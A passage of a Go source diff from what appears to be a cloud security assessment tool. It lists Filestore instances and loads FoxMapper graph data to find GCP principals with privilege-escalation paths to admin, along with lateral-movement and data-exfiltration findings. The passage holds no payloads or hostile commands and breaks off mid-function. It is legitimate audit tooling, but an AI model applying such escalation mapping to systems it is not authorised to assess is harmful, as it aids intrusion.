ROOT_SQUASH + AnonUID int64 `json:"anonUid"` + AnonGID int64 `json:"anonGid"` +} + +// getService returns a Filestore service client using cached session if available +func (s *FilestoreService) getService(ctx context.Context) (*file.Service, error) { + if s.session != nil { + return sdk.CachedGetFilestoreService(ctx, s.session) + } + return file.NewService(ctx) +} + +func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { + ctx := 
context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + + var instances []FilestoreInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *file.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := FilestoreInstanceInfo{ + Name: extractResourceName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + Tier: instance.Tier, + State: instance.State, + CreateTime: instance.CreateTime, + Protocol: instance.Protocol, // NFS_V3, NFS_V4_1 + } + + if len(instance.Networks) > 0 { + info.Network = instance.Networks[0].Network + info.IPAddresses = instance.Networks[0].IpAddresses + } + + for _, share := range instance.FileShares { + shareInfo := ShareInfo{ + Name: share.Name, + CapacityGB: share.CapacityGb, + } + + // Parse NFS export options + for _, opt := range share.NfsExportOptions { + exportOpt := NfsExportOption{ + IPRanges: opt.IpRanges, + AccessMode: opt.AccessMode, + SquashMode: opt.SquashMode, + AnonUID: opt.AnonUid, + AnonGID: opt.AnonGid, + } + shareInfo.NfsExportOptions = append(shareInfo.NfsExportOptions, exportOpt) + } + + info.Shares = append(info.Shares, shareInfo) + } + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + return instances, nil +} + +func extractResourceName(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +func extractLocation(name string) string { + parts := strings.Split(name, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/foxmapperService/foxmapperService.go 
b/gcp/services/foxmapperService/foxmapperService.go new file mode 100755 index 00000000..cbc0f97a --- /dev/null +++ b/gcp/services/foxmapperService/foxmapperService.go @@ -0,0 +1,1861 @@ +package foxmapperService + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "runtime" + "sort" + "strings" + + "github.com/dominikbraun/graph" +) + +// Node represents a GCP IAM principal from FoxMapper graph +type Node struct { + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + Email string `json:"email"` + DisplayName string `json:"display_name"` + ProjectID string `json:"project_id"` + UniqueID string `json:"unique_id"` + IAMBindings []map[string]any `json:"iam_bindings"` + IsAdmin bool `json:"is_admin"` + AdminLevel string `json:"admin_level"` // org, folder, project + IsDisabled bool `json:"is_disabled"` + HasKeys bool `json:"has_keys"` + KeyCount int `json:"key_count"` + Tags map[string]string `json:"tags"` + Description string `json:"description"` + OAuth2ClientID string `json:"oauth2_client_id"` + AttachedResources []map[string]any `json:"attached_resources"` + WorkloadIdentityBindings []map[string]any `json:"workload_identity_bindings"` + GroupMemberships []string `json:"group_memberships"` + Domain string `json:"domain"` + // Computed fields + PathToAdmin bool + CanPrivEscToAdminString string + IsAdminString string +} + +// FlexibleBool handles JSON that may be bool, array, or other types +// Used for scope_limited which may vary between FoxMapper versions +type FlexibleBool bool + +func (fb *FlexibleBool) UnmarshalJSON(data []byte) error { + // Try bool first + var b bool + if err := json.Unmarshal(data, &b); err == nil { + *fb = FlexibleBool(b) + return nil + } + + // Try array (non-empty array = true) + var arr []interface{} + if err := json.Unmarshal(data, &arr); err == nil { + *fb = FlexibleBool(len(arr) > 0) + return nil + } + + // Try string ("true"/"false") + var s string + if err := json.Unmarshal(data, &s); err == nil 
{ + *fb = FlexibleBool(s == "true" || s == "True" || s == "1") + return nil + } + + // Default to false + *fb = false + return nil +} + +// Edge represents a privilege escalation edge from FoxMapper graph +type Edge struct { + Source string `json:"source"` + Destination string `json:"destination"` + Reason string `json:"reason"` + ShortReason string `json:"short_reason"` + EdgeType string `json:"edge_type"` + Resource string `json:"resource"` + Confidence string `json:"confidence,omitempty"` // high (default/empty), medium, low + Conditions map[string]any `json:"conditions"` + ScopeLimited FlexibleBool `json:"scope_limited"` + ScopeWarning string `json:"scope_warning"` + ScopeBlocksEscalation FlexibleBool `json:"scope_blocks_escalation"` + ScopeAllowsMethods []string `json:"scope_allows_methods"` + Scopes []string `json:"scopes"` +} + +// EffectiveConfidence returns the edge's confidence, defaulting to "high" if empty +func (e Edge) EffectiveConfidence() string { + if e.Confidence == "" { + return "high" + } + return e.Confidence +} + +// WorstConfidence returns the worse of two confidence levels (low < medium < high) +func WorstConfidence(a, b string) string { + order := map[string]int{"low": 0, "medium": 1, "high": 2} + if a == "" { + a = "high" + } + if b == "" { + b = "high" + } + if order[a] <= order[b] { + return a + } + return b +} + +// Policy represents an IAM policy from FoxMapper graph +type Policy struct { + Resource string `json:"resource"` + Bindings []PolicyBinding `json:"bindings"` + Version int `json:"version"` +} + +// PolicyBinding represents a single IAM binding +type PolicyBinding struct { + Role string `json:"role"` + Members []string `json:"members"` + Condition map[string]any `json:"condition"` +} + +// GraphMetadata contains metadata about the FoxMapper graph +type GraphMetadata struct { + ProjectID string `json:"project_id"` + OrgID string `json:"org_id"` + CreatedAt string `json:"created_at"` + FoxMapperVersion string 
`json:"foxmapper_version"`
}

// PrivescPath represents a privilege escalation path
type PrivescPath struct {
	Source       string
	Destination  string
	Edges        []Edge
	HopCount     int
	AdminLevel   string // org, folder, project
	ScopeBlocked bool
	Confidence   string // worst confidence across all edges in path (high, medium, low)
}

// FoxMapperService provides access to FoxMapper graph data
type FoxMapperService struct {
	DataBasePath string
	Nodes        []Node
	Edges        []Edge
	Policies     []Policy
	Metadata     GraphMetadata
	nodeMap      map[string]*Node // index of Nodes by member_id (and email, when present)
	graph        graph.Graph[string, string]
	initialized  bool

	// Pre-computed findings from FoxMapper presets
	LateralFindingsData   *LateralFindingsFile   // From lateral_findings.json
	DataExfilFindingsData *DataExfilFindingsFile // From data_exfil_findings.json
}

// LateralFindingsFile represents the wrapper for lateral_findings.json
type LateralFindingsFile struct {
	ProjectID               string                     `json:"project_id"`
	TotalTechniquesAnalyzed int                        `json:"total_techniques_analyzed"`
	TechniquesWithAccess    int                        `json:"techniques_with_access"`
	CategoriesSummary       map[string]CategorySummary `json:"categories_summary"`
	Findings                []LateralFindingEntry      `json:"findings"`
}

// DataExfilFindingsFile represents the wrapper for data_exfil_findings.json
type DataExfilFindingsFile struct {
	ProjectID               string                    `json:"project_id"`
	TotalTechniquesAnalyzed int                       `json:"total_techniques_analyzed"`
	TechniquesWithAccess    int                       `json:"techniques_with_access"`
	PublicResources         []string                  `json:"public_resources"`
	ServicesSummary         map[string]ServiceSummary `json:"services_summary"`
	Findings                []DataExfilFindingEntry   `json:"findings"`
}

// CategorySummary provides summary info for a lateral movement category
type CategorySummary struct {
	Count       int    `json:"count"`
	Description string `json:"description"`
}

// ServiceSummary provides summary info for a data exfil service
type ServiceSummary struct {
	Count              int `json:"count"`
	TotalPrincipals    int `json:"total_principals"`
	NonAdminPrincipals int `json:"non_admin_principals"`
	ViaPrivesc         int `json:"via_privesc"`
	ResourceLevel      int `json:"resource_level"`
}

// LateralFindingEntry represents a single lateral movement finding
type LateralFindingEntry struct {
	Technique      string                `json:"technique"`
	Permission     string                `json:"permission"`
	Category       string                `json:"category"`
	Description    string                `json:"description"`
	Exploitation   string                `json:"exploitation"`
	PrincipalCount int                   `json:"principal_count"`
	NonAdminCount  int                   `json:"non_admin_count"`
	ViaEdgeCount   int                   `json:"via_edge_count"`
	Principals     []PrincipalAccessFile `json:"principals"`
}

// DataExfilFindingEntry represents a single data exfil finding
type DataExfilFindingEntry struct {
	Technique      string                `json:"technique"`
	Permission     string                `json:"permission"`
	Service        string                `json:"service"`
	Description    string                `json:"description"`
	Exploitation   string                `json:"exploitation"`
	PrincipalCount int                   `json:"principal_count"`
	NonAdminCount  int                   `json:"non_admin_count"`
	ViaEdgeCount   int                   `json:"via_edge_count"`
	Principals     []PrincipalAccessFile `json:"principals"`
}

// PrincipalAccessFile represents a principal with access from FoxMapper findings
type PrincipalAccessFile struct {
	Principal        string   `json:"principal"`
	MemberID         string   `json:"member_id"`
	MemberType       string   `json:"member_type"`
	IsAdmin          bool     `json:"is_admin"`
	IsServiceAccount bool     `json:"is_service_account"`
	AccessType       string   `json:"access_type"` // direct, via_privesc
	ViaEdge          bool     `json:"via_edge"`
	EdgePath         []string `json:"edge_path,omitempty"`
	Resource         string   `json:"resource,omitempty"`
	// Scope information (may be in JSON or derived from Resource)
	ScopeType string `json:"scope_type,omitempty"`
	ScopeID   string `json:"scope_id,omitempty"`
	ScopeName string `json:"scope_name,omitempty"`
}

// New creates a new FoxMapperService
func New() *FoxMapperService {
	return &FoxMapperService{
		nodeMap:
make(map[string]*Node),
	}
}

// generateFoxMapperDataBasePaths returns paths to check for FoxMapper data
// FoxMapper saves data with prefixes: org-{id}, proj-{id}, folder-{id}
func generateFoxMapperDataBasePaths(identifier string, isOrg bool) []string {
	var paths []string
	homeDir, err := os.UserHomeDir()
	if err != nil {
		// No home directory available; return an empty candidate list.
		return paths
	}

	// Determine the prefixed identifier FoxMapper uses
	// FoxMapper saves as: org-{id}, proj-{id}, folder-{id}
	var prefixedIdentifiers []string
	if isOrg {
		prefixedIdentifiers = append(prefixedIdentifiers, "org-"+identifier)
	} else {
		prefixedIdentifiers = append(prefixedIdentifiers, "proj-"+identifier)
	}
	// Also try without prefix for backwards compatibility
	prefixedIdentifiers = append(prefixedIdentifiers, identifier)

	gcpDir := "gcp"

	// Generate paths for each possible identifier format
	for _, prefixedID := range prefixedIdentifiers {
		// Platform-specific paths
		if runtime.GOOS == "darwin" {
			// macOS: ~/Library/Application Support/foxmapper/gcp/{id}
			paths = append(paths, filepath.Join(homeDir, "Library", "Application Support", "foxmapper", gcpDir, prefixedID))
		} else if runtime.GOOS == "windows" {
			// Windows: %APPDATA%/foxmapper/gcp/{id}
			appData := os.Getenv("APPDATA")
			if appData != "" {
				paths = append(paths, filepath.Join(appData, "foxmapper", gcpDir, prefixedID))
			}
		}

		// Linux/BSD and fallback for all platforms
		// Check XDG_DATA_HOME first
		xdgDataHome := os.Getenv("XDG_DATA_HOME")
		if xdgDataHome != "" {
			paths = append(paths, filepath.Join(xdgDataHome, "foxmapper", gcpDir, prefixedID))
		}

		// Default: ~/.local/share/foxmapper/gcp/{id}
		paths = append(paths, filepath.Join(homeDir, ".local", "share", "foxmapper", gcpDir, prefixedID))
	}

	// Legacy pmapper paths (for backwards compatibility) - without prefix
	if runtime.GOOS == "darwin" {
		paths = append(paths, filepath.Join(homeDir, "Library", "Application Support", "com.nccgroup.principalmapper", identifier))
	} else {
		xdgDataHome := os.Getenv("XDG_DATA_HOME")
		if xdgDataHome != "" {
			paths = append(paths, filepath.Join(xdgDataHome, "principalmapper", identifier))
		}
		paths = append(paths, filepath.Join(homeDir, ".local", "share", "principalmapper", identifier))
	}

	return paths
}

// LoadGraph loads FoxMapper graph data for an org or project
func (s *FoxMapperService) LoadGraph(identifier string, isOrg bool) error {
	// Try to find FoxMapper data
	var graphPath string
	paths := generateFoxMapperDataBasePaths(identifier, isOrg)

	// The first candidate directory containing graph/nodes.json wins.
	for _, path := range paths {
		graphDir := filepath.Join(path, "graph")
		nodesPath := filepath.Join(graphDir, "nodes.json")
		if _, err := os.Stat(nodesPath); err == nil {
			graphPath = path
			break
		}
	}

	if graphPath == "" {
		return fmt.Errorf("no FoxMapper data found for %s. Run 'foxmapper gcp graph create' first", identifier)
	}

	return s.LoadGraphFromPath(graphPath)
}

// LoadGraphFromPath loads FoxMapper graph from a specific path
func (s *FoxMapperService) LoadGraphFromPath(path string) error {
	graphDir := filepath.Join(path, "graph")

	// Load nodes (required)
	nodesPath := filepath.Join(graphDir, "nodes.json")
	nodesData, err := os.ReadFile(nodesPath)
	if err != nil {
		return fmt.Errorf("failed to read nodes.json: %w", err)
	}
	if err := json.Unmarshal(nodesData, &s.Nodes); err != nil {
		return fmt.Errorf("failed to parse nodes.json: %w", err)
	}

	// Build node map
	for i := range s.Nodes {
		s.nodeMap[s.Nodes[i].MemberID] = &s.Nodes[i]
		// Also map by email for convenience
		if s.Nodes[i].Email != "" {
			s.nodeMap[s.Nodes[i].Email] = &s.Nodes[i]
		}
	}

	// Load edges (required)
	edgesPath := filepath.Join(graphDir, "edges.json")
	edgesData, err := os.ReadFile(edgesPath)
	if err != nil {
		return fmt.Errorf("failed to read edges.json: %w", err)
	}
	if err := json.Unmarshal(edgesData, &s.Edges); err != nil {
		return fmt.Errorf("failed to parse edges.json: %w", err)
	}

	// Load
policies (optional) + policiesPath := filepath.Join(graphDir, "policies.json") + if policiesData, err := os.ReadFile(policiesPath); err == nil { + json.Unmarshal(policiesData, &s.Policies) + } + + // Load metadata (optional) + metadataPath := filepath.Join(path, "metadata.json") + if metadataData, err := os.ReadFile(metadataPath); err == nil { + json.Unmarshal(metadataData, &s.Metadata) + } + + // Load pre-computed lateral movement findings (optional) + lateralPath := filepath.Join(graphDir, "lateral_findings.json") + if lateralData, err := os.ReadFile(lateralPath); err == nil { + var lateralFindings LateralFindingsFile + if json.Unmarshal(lateralData, &lateralFindings) == nil { + s.LateralFindingsData = &lateralFindings + } + } + + // Load pre-computed data exfil findings (optional) + dataExfilPath := filepath.Join(graphDir, "data_exfil_findings.json") + if dataExfilData, err := os.ReadFile(dataExfilPath); err == nil { + var dataExfilFindings DataExfilFindingsFile + if json.Unmarshal(dataExfilData, &dataExfilFindings) == nil { + s.DataExfilFindingsData = &dataExfilFindings + } + } + + // Build graph for path finding + s.buildGraph() + + // Compute path to admin for all nodes + s.computePathsToAdmin() + + s.initialized = true + return nil +} + +// MergeGraphFromPath merges another graph into this service +// Used to combine multiple project graphs into a single view +func (s *FoxMapperService) MergeGraphFromPath(path string) error { + graphDir := filepath.Join(path, "graph") + + // Load nodes from the other graph + nodesPath := filepath.Join(graphDir, "nodes.json") + nodesData, err := os.ReadFile(nodesPath) + if err != nil { + return fmt.Errorf("failed to read nodes.json: %w", err) + } + var otherNodes []Node + if err := json.Unmarshal(nodesData, &otherNodes); err != nil { + return fmt.Errorf("failed to parse nodes.json: %w", err) + } + + // Load edges from the other graph + edgesPath := filepath.Join(graphDir, "edges.json") + edgesData, err := 
os.ReadFile(edgesPath) + if err != nil { + return fmt.Errorf("failed to read edges.json: %w", err) + } + var otherEdges []Edge + if err := json.Unmarshal(edgesData, &otherEdges); err != nil { + return fmt.Errorf("failed to parse edges.json: %w", err) + } + + // Merge nodes (avoid duplicates by member_id) + existingNodes := make(map[string]bool) + for _, node := range s.Nodes { + existingNodes[node.MemberID] = true + } + for _, node := range otherNodes { + if !existingNodes[node.MemberID] { + s.Nodes = append(s.Nodes, node) + s.nodeMap[node.MemberID] = &s.Nodes[len(s.Nodes)-1] + if node.Email != "" { + s.nodeMap[node.Email] = &s.Nodes[len(s.Nodes)-1] + } + existingNodes[node.MemberID] = true + } + } + + // Merge edges (avoid duplicates by source+destination+short_reason) + type edgeKey struct { + source, dest, reason string + } + existingEdges := make(map[edgeKey]bool) + for _, edge := range s.Edges { + existingEdges[edgeKey{edge.Source, edge.Destination, edge.ShortReason}] = true + } + for _, edge := range otherEdges { + key := edgeKey{edge.Source, edge.Destination, edge.ShortReason} + if !existingEdges[key] { + s.Edges = append(s.Edges, edge) + existingEdges[key] = true + } + } + + // Load and merge policies (optional) + policiesPath := filepath.Join(graphDir, "policies.json") + if policiesData, err := os.ReadFile(policiesPath); err == nil { + var otherPolicies []Policy + if json.Unmarshal(policiesData, &otherPolicies) == nil { + // Simple append for policies - could dedupe by resource if needed + s.Policies = append(s.Policies, otherPolicies...) 
+ } + } + + // Load and merge lateral findings (optional) + lateralPath := filepath.Join(graphDir, "lateral_findings.json") + if lateralData, err := os.ReadFile(lateralPath); err == nil { + var otherLateral LateralFindingsFile + if json.Unmarshal(lateralData, &otherLateral) == nil { + if s.LateralFindingsData == nil { + s.LateralFindingsData = &otherLateral + } else { + // Merge findings from both + s.LateralFindingsData.Findings = append(s.LateralFindingsData.Findings, otherLateral.Findings...) + s.LateralFindingsData.TechniquesWithAccess += otherLateral.TechniquesWithAccess + } + } + } + + // Load and merge data exfil findings (optional) + dataExfilPath := filepath.Join(graphDir, "data_exfil_findings.json") + if dataExfilData, err := os.ReadFile(dataExfilPath); err == nil { + var otherDataExfil DataExfilFindingsFile + if json.Unmarshal(dataExfilData, &otherDataExfil) == nil { + if s.DataExfilFindingsData == nil { + s.DataExfilFindingsData = &otherDataExfil + } else { + // Merge findings from both + s.DataExfilFindingsData.Findings = append(s.DataExfilFindingsData.Findings, otherDataExfil.Findings...) 
+ s.DataExfilFindingsData.TechniquesWithAccess += otherDataExfil.TechniquesWithAccess + } + } + } + + return nil +} + +// RebuildAfterMerge rebuilds the in-memory graph and recomputes paths after merging +func (s *FoxMapperService) RebuildAfterMerge() { + s.buildGraph() + s.computePathsToAdmin() + s.initialized = true +} + +// buildGraph creates an in-memory graph for path finding +func (s *FoxMapperService) buildGraph() { + s.graph = graph.New(graph.StringHash, graph.Directed()) + + // Add all nodes as vertices + for _, node := range s.Nodes { + _ = s.graph.AddVertex(node.MemberID) + } + + // Add all edges + for _, edge := range s.Edges { + _ = s.graph.AddEdge( + edge.Source, + edge.Destination, + graph.EdgeAttribute("reason", edge.Reason), + graph.EdgeAttribute("short_reason", edge.ShortReason), + ) + } +} + +// computePathsToAdmin computes whether each node has a path to an admin node +func (s *FoxMapperService) computePathsToAdmin() { + adminNodes := s.GetAdminNodes() + + for i := range s.Nodes { + if s.Nodes[i].IsAdmin { + s.Nodes[i].PathToAdmin = true + s.Nodes[i].CanPrivEscToAdminString = "Admin" + s.Nodes[i].IsAdminString = "Yes" + } else { + hasPath := false + for _, admin := range adminNodes { + path, _ := graph.ShortestPath(s.graph, s.Nodes[i].MemberID, admin.MemberID) + if len(path) > 0 && s.Nodes[i].MemberID != admin.MemberID { + hasPath = true + break + } + } + s.Nodes[i].PathToAdmin = hasPath + if hasPath { + s.Nodes[i].CanPrivEscToAdminString = "Yes" + } else { + s.Nodes[i].CanPrivEscToAdminString = "No" + } + s.Nodes[i].IsAdminString = "No" + } + } +} + +// IsInitialized returns whether the graph has been loaded +func (s *FoxMapperService) IsInitialized() bool { + return s.initialized +} + +// GetNode returns a node by member_id or email +func (s *FoxMapperService) GetNode(identifier string) *Node { + // Try direct lookup + if node, ok := s.nodeMap[identifier]; ok { + return node + } + // Try with serviceAccount: prefix + if node, ok := 
s.nodeMap["serviceAccount:"+identifier]; ok { + return node + } + // Try with user: prefix + if node, ok := s.nodeMap["user:"+identifier]; ok { + return node + } + return nil +} + +// GetAdminNodes returns all admin nodes +func (s *FoxMapperService) GetAdminNodes() []*Node { + var admins []*Node + for i := range s.Nodes { + if s.Nodes[i].IsAdmin { + admins = append(admins, &s.Nodes[i]) + } + } + return admins +} + +// GetNodesWithPrivesc returns all nodes that can escalate to admin +func (s *FoxMapperService) GetNodesWithPrivesc() []*Node { + var nodes []*Node + for i := range s.Nodes { + if s.Nodes[i].PathToAdmin && !s.Nodes[i].IsAdmin { + nodes = append(nodes, &s.Nodes[i]) + } + } + return nodes +} + +// DoesPrincipalHavePathToAdmin checks if a principal can escalate to admin +func (s *FoxMapperService) DoesPrincipalHavePathToAdmin(principal string) bool { + node := s.GetNode(principal) + if node == nil { + return false + } + return node.PathToAdmin +} + +// IsPrincipalAdmin checks if a principal is an admin +func (s *FoxMapperService) IsPrincipalAdmin(principal string) bool { + node := s.GetNode(principal) + if node == nil { + return false + } + return node.IsAdmin +} + +// GetPrivescPaths returns all privesc paths for a principal +func (s *FoxMapperService) GetPrivescPaths(principal string) []PrivescPath { + node := s.GetNode(principal) + if node == nil { + return nil + } + + var paths []PrivescPath + adminNodes := s.GetAdminNodes() + + for _, admin := range adminNodes { + if node.MemberID == admin.MemberID { + continue + } + + shortestPath, _ := graph.ShortestPath(s.graph, node.MemberID, admin.MemberID) + if len(shortestPath) > 0 { + // Build edges for this path + var pathEdges []Edge + scopeBlocked := false + pathConfidence := "high" + for i := 0; i < len(shortestPath)-1; i++ { + edge := s.findEdge(shortestPath[i], shortestPath[i+1]) + if edge != nil { + pathEdges = append(pathEdges, *edge) + if edge.ScopeBlocksEscalation { + scopeBlocked = true + } + 
pathConfidence = WorstConfidence(pathConfidence, edge.EffectiveConfidence()) + } + } + + paths = append(paths, PrivescPath{ + Source: node.Email, + Destination: admin.Email, + Edges: pathEdges, + HopCount: len(pathEdges), + AdminLevel: admin.AdminLevel, + ScopeBlocked: scopeBlocked, + Confidence: pathConfidence, + }) + } + } + + // Sort by hop count + sort.Slice(paths, func(i, j int) bool { + return paths[i].HopCount < paths[j].HopCount + }) + + return paths +} + +// findEdge finds an edge between two nodes +func (s *FoxMapperService) findEdge(source, dest string) *Edge { + for i := range s.Edges { + if s.Edges[i].Source == source && s.Edges[i].Destination == dest { + return &s.Edges[i] + } + } + return nil +} + +// GetAttackSummary returns a summary string like "Privesc/Exfil/Lateral" for a principal +// This is used by other modules to display attack path info +func (s *FoxMapperService) GetAttackSummary(principal string) string { + if !s.initialized { + return "No FoxMapper data" + } + + node := s.GetNode(principal) + if node == nil { + return "Unknown" + } + + if node.IsAdmin { + adminLevel := node.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + return fmt.Sprintf("Admin (%s)", adminLevel) + } + + if node.PathToAdmin { + paths := s.GetPrivescPaths(principal) + if len(paths) > 0 { + // Find the highest admin level reachable and best confidence + highestLevel := "project" + shortestHops := paths[0].HopCount + bestConfidence := paths[0].Confidence + for _, p := range paths { + if p.AdminLevel == "org" { + highestLevel = "org" + } else if p.AdminLevel == "folder" && highestLevel != "org" { + highestLevel = "folder" + } + } + if bestConfidence != "" && bestConfidence != "high" { + return fmt.Sprintf("Privesc->%s (%d hops, %s confidence)", highestLevel, shortestHops, bestConfidence) + } + return fmt.Sprintf("Privesc->%s (%d hops)", highestLevel, shortestHops) + } + return "Privesc" + } + + return "No" +} + +// GetPrivescSummary returns a summary of 
// all privesc paths in the graph
func (s *FoxMapperService) GetPrivescSummary() map[string]interface{} {
	totalNodes := len(s.Nodes)
	adminNodes := len(s.GetAdminNodes())
	nodesWithPrivesc := len(s.GetNodesWithPrivesc())

	// Count by admin level
	orgAdmins := 0
	folderAdmins := 0
	projectAdmins := 0
	for _, node := range s.Nodes {
		if node.IsAdmin {
			switch node.AdminLevel {
			case "org":
				orgAdmins++
			case "folder":
				folderAdmins++
			case "project":
				projectAdmins++
			default:
				// Unknown/empty admin level is counted as project-level.
				projectAdmins++
			}
		}
	}

	// Count by principal type
	saWithPrivesc := 0
	userWithPrivesc := 0
	for _, node := range s.GetNodesWithPrivesc() {
		if node.MemberType == "serviceAccount" {
			saWithPrivesc++
		} else if node.MemberType == "user" {
			userWithPrivesc++
		}
	}

	return map[string]interface{}{
		"total_nodes":        totalNodes,
		"admin_nodes":        adminNodes,
		"non_admin_nodes":    totalNodes - adminNodes,
		"nodes_with_privesc": nodesWithPrivesc,
		"org_admins":         orgAdmins,
		"folder_admins":      folderAdmins,
		"project_admins":     projectAdmins,
		"sa_with_privesc":    saWithPrivesc,
		"user_with_privesc":  userWithPrivesc,
		"percent_with_privesc": func() float64 {
			// Guard against division by zero when every node is an admin.
			if totalNodes-adminNodes == 0 {
				return 0
			}
			return float64(nodesWithPrivesc) / float64(totalNodes-adminNodes) * 100
		}(),
	}
}

// FormatPrivescPath formats a privesc path for display
func FormatPrivescPath(path PrivescPath) string {
	var sb strings.Builder
	confidenceInfo := ""
	if path.Confidence != "" && path.Confidence != "high" {
		confidenceInfo = fmt.Sprintf(", %s confidence", path.Confidence)
	}
	sb.WriteString(fmt.Sprintf("%s -> %s (%d hops%s)\n", path.Source, path.Destination, path.HopCount, confidenceInfo))
	for i, edge := range path.Edges {
		annotations := ""
		if edge.ScopeBlocksEscalation {
			annotations = " [BLOCKED BY SCOPE]"
		} else if edge.ScopeLimited {
			annotations = " [scope-limited]"
		}
		edgeConf := edge.EffectiveConfidence()
		if edgeConf != "high" {
			annotations += fmt.Sprintf(" [%s confidence]", edgeConf)
		}
		sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations))
	}
	return sb.String()
}

// GetEdgesFrom returns all edges from a given node
func (s *FoxMapperService) GetEdgesFrom(principal string) []Edge {
	var edges []Edge
	node := s.GetNode(principal)
	if node == nil {
		return edges
	}

	for _, edge := range s.Edges {
		if edge.Source == node.MemberID {
			edges = append(edges, edge)
		}
	}
	return edges
}

// GetEdgesTo returns all edges to a given node
func (s *FoxMapperService) GetEdgesTo(principal string) []Edge {
	var edges []Edge
	node := s.GetNode(principal)
	if node == nil {
		return edges
	}

	for _, edge := range s.Edges {
		if edge.Destination == node.MemberID {
			edges = append(edges, edge)
		}
	}
	return edges
}

// FindFoxMapperData searches for FoxMapper data and returns the path if found
func FindFoxMapperData(identifier string, isOrg bool) (string, error) {
	paths := generateFoxMapperDataBasePaths(identifier, isOrg)

	// First candidate directory containing graph/nodes.json wins.
	for _, path := range paths {
		graphDir := filepath.Join(path, "graph")
		nodesPath := filepath.Join(graphDir, "nodes.json")
		if _, err := os.Stat(nodesPath); err == nil {
			return path, nil
		}
	}

	return "", fmt.Errorf("no FoxMapper data found for %s", identifier)
}

// GetServiceAccountNodes returns all service account nodes
func (s *FoxMapperService) GetServiceAccountNodes() []*Node {
	var nodes []*Node
	for i := range s.Nodes {
		if s.Nodes[i].MemberType == "serviceAccount" {
			nodes = append(nodes, &s.Nodes[i])
		}
	}
	return nodes
}

// ==========================================
// FoxMapper Preset Execution Support
// ==========================================

// PresetResult represents the result of running a FoxMapper preset
type PresetResult struct {
	Preset        string `json:"preset"`
	ProjectID     string `json:"project_id"`
	TotalFindings int    `json:"total_findings"`
	Findings      []PresetFinding
`json:"findings"`
	Summary           map[string]interface{}  `json:"summary"`
	CategoriesSummary map[string]CategoryInfo `json:"categories_summary"`
}

// PresetFinding represents a single finding from a preset
type PresetFinding struct {
	Technique      string            `json:"technique"`
	Permission     string            `json:"permission"`
	Category       string            `json:"category"`
	Service        string            `json:"service,omitempty"`
	Description    string            `json:"description"`
	Exploitation   string            `json:"exploitation"`
	PrincipalCount int               `json:"principal_count"`
	NonAdminCount  int               `json:"non_admin_count"`
	ViaEdgeCount   int               `json:"via_edge_count,omitempty"`
	Principals     []PrincipalAccess `json:"principals"`
	Resources      []string          `json:"resources_with_access,omitempty"`
}

// PrincipalAccess represents a principal with access to a technique
type PrincipalAccess struct {
	Principal        string   `json:"principal"`
	MemberID         string   `json:"member_id"`
	MemberType       string   `json:"member_type"`
	IsAdmin          bool     `json:"is_admin"`
	IsServiceAccount bool     `json:"is_service_account"`
	AccessType       string   `json:"access_type"` // project_iam, resource_iam, via_privesc
	ViaEdge          bool     `json:"via_edge"`
	EdgePath         []string `json:"edge_path,omitempty"`
	HasCondition     bool     `json:"has_condition"`
	// Scope information - WHERE the permission was granted
	ScopeType string `json:"scope_type,omitempty"` // organization, folder, project
	ScopeID   string `json:"scope_id,omitempty"`   // The org/folder/project ID
	ScopeName string `json:"scope_name,omitempty"` // Display name if available
}

// CategoryInfo provides summary info for a category
type CategoryInfo struct {
	Count       int    `json:"count"`
	Description string `json:"description"`
}

// PrivescFinding represents a privilege escalation finding
type PrivescFinding struct {
	Principal               string        `json:"principal"`
	MemberType              string        `json:"member_type"`
	IsAdmin                 bool          `json:"is_admin"`
	CanEscalate             bool          `json:"can_escalate"`
	HighestAdminLevel       string        `json:"highest_admin_level"`       // org, folder, project
	HighestReachableTarget  string        `json:"highest_reachable_target"`  // The admin principal that can be reached
	HighestReachableProject string        `json:"highest_reachable_project"` // The project of the highest reachable admin
	ViablePathCount         int           `json:"viable_path_count"`
	ScopeBlockedCount       int           `json:"scope_blocked_count"`
	PathsToOrgAdmin         int           `json:"paths_to_org_admin"`
	PathsToFolderAdmin      int           `json:"paths_to_folder_admin"`
	PathsToProjectAdmin     int           `json:"paths_to_project_admin"`
	ShortestPathHops        int           `json:"shortest_path_hops"`
	BestPathConfidence      string        `json:"best_path_confidence,omitempty"` // confidence of best path (high, medium, low)
	Paths                   []PrivescPath `json:"paths,omitempty"`
}

// AnalyzePrivesc analyzes privilege escalation using graph data
// This is equivalent to running "foxmapper gcp query preset privesc"
func (s *FoxMapperService) AnalyzePrivesc() []PrivescFinding {
	if !s.initialized {
		return nil
	}

	var findings []PrivescFinding

	for i := range s.Nodes {
		node := &s.Nodes[i]

		finding := PrivescFinding{
			Principal:  node.Email,
			MemberType: node.MemberType,
			IsAdmin:    node.IsAdmin,
		}

		if node.IsAdmin {
			finding.HighestAdminLevel = node.AdminLevel
			if finding.HighestAdminLevel == "" {
				finding.HighestAdminLevel = "project"
			}
			// For admins, they are their own "target"
			finding.HighestReachableTarget = node.Email
			finding.HighestReachableProject = node.ProjectID
		} else if node.PathToAdmin {
			finding.CanEscalate = true
			paths := s.GetPrivescPaths(node.MemberID)
			finding.Paths = paths

			// Track the best path (highest level, then shortest hops within it)
			var bestPath *PrivescPath

			// Analyze paths
			for idx := range paths {
				path := &paths[idx]
				if path.ScopeBlocked {
					finding.ScopeBlockedCount++
				} else {
					finding.ViablePathCount++
				}

				// Track admin level and update best path.
				// Level precedence: org > folder > project; within the
				// current highest level, a shorter path replaces bestPath.
				switch path.AdminLevel {
				case "org":
					finding.PathsToOrgAdmin++
					if finding.HighestAdminLevel != "org" {
						finding.HighestAdminLevel = "org"
						bestPath = path
